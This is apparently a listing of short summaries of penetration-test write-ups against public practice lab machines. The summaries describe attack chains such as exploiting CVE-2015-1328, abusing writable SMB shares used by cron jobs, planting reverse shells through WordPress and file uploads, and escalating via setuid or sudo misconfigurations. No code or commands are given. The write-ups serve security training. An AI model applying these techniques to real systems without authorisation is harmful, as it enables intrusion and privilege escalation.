Write-ups and penetration test reports from simulated pentests against publically available lab machines, such as those on OffSec’s Proving Grounds, HackTheBox, TryHackMe, etc.
Credentials hidden in plain sight lead to overlay exploit.
The target machine’s website contains cleartext usernames and passwords in plain view of the public (CWE-256), which allow initial access to an authenticated shell. The machine is running an out of date Linux version (3.13.0) that is vulnerable to a known privilege escalation flaw in the overlayfs module (CVE-2015-1328). I leveraged this vulnerability to successfully obtain root privileges.
Running cron jobs from world-writable file shares is ill advised.
The target machine was successfully compromised by exploiting a critical vulnerability stemming from unauthenticated write access to an SMB share (ITDEPT) which is a dependancy of a cron job being run in the context of the unprivileged user dawn. This led to initial access / remote code execution (RCE), after which privilege escalation was gained through a different cron job which also depended on file paths located on the vulnerable file share. This enabled modification of the /etc/passwd file leading to root access.
Finding root with weak passwords
I successfully gained root access on the target machine.
This machine contains a wordpress site which is configured with a weak password for an admin user, c0ldd.
I placed a reverse shell script into the wordpress website by leveraging built-in wordpress file editing functionality after authenticating with the weak credentials.
After gaining shell access I was able to elevate to root using a common Linux utility, find, which was misconfigured with setuid permissions allowing it to obtain root privileges.
A hidden blog, an upload vuln, and weak user credentials wrapped in a bunch of misdirection.
I successfully compromised the target system and gained root access. Initial access was achieved by discovering a hidden blog application hosting a vulnerable unauthenticated file upload feature. I exploited this vulnerability to upload a malicious reverse-shell php script, gaining low-privileged local access.
Post-exploitation enumeration revealed a user account with a weak, predictable password, which allowed lateral movement. This account was in turn allowed to use the sudo command without restriction leading to escalation to root permissions.
A 5-point machine on Proving Grounds Play.
The target machine was running an out-of-date version of a web forum software which contained a local file inclusion vulnerability allowing arbitrary php code execution via an authenticated file upload mechanism. Further, the machine included a network test tool that was configured in a way that allowed low privileged users to run arbitrary commands as root.
I enumerated the machine using nmap and gobuster, located the vulnerable web app and potential exploits with exploitdb, exploited the vulnerable web app using the provided proof-of-concept, then enumerated the user environment with builtin tools, located the network test tool, and finally exploited it via the method discribed on gtfobins.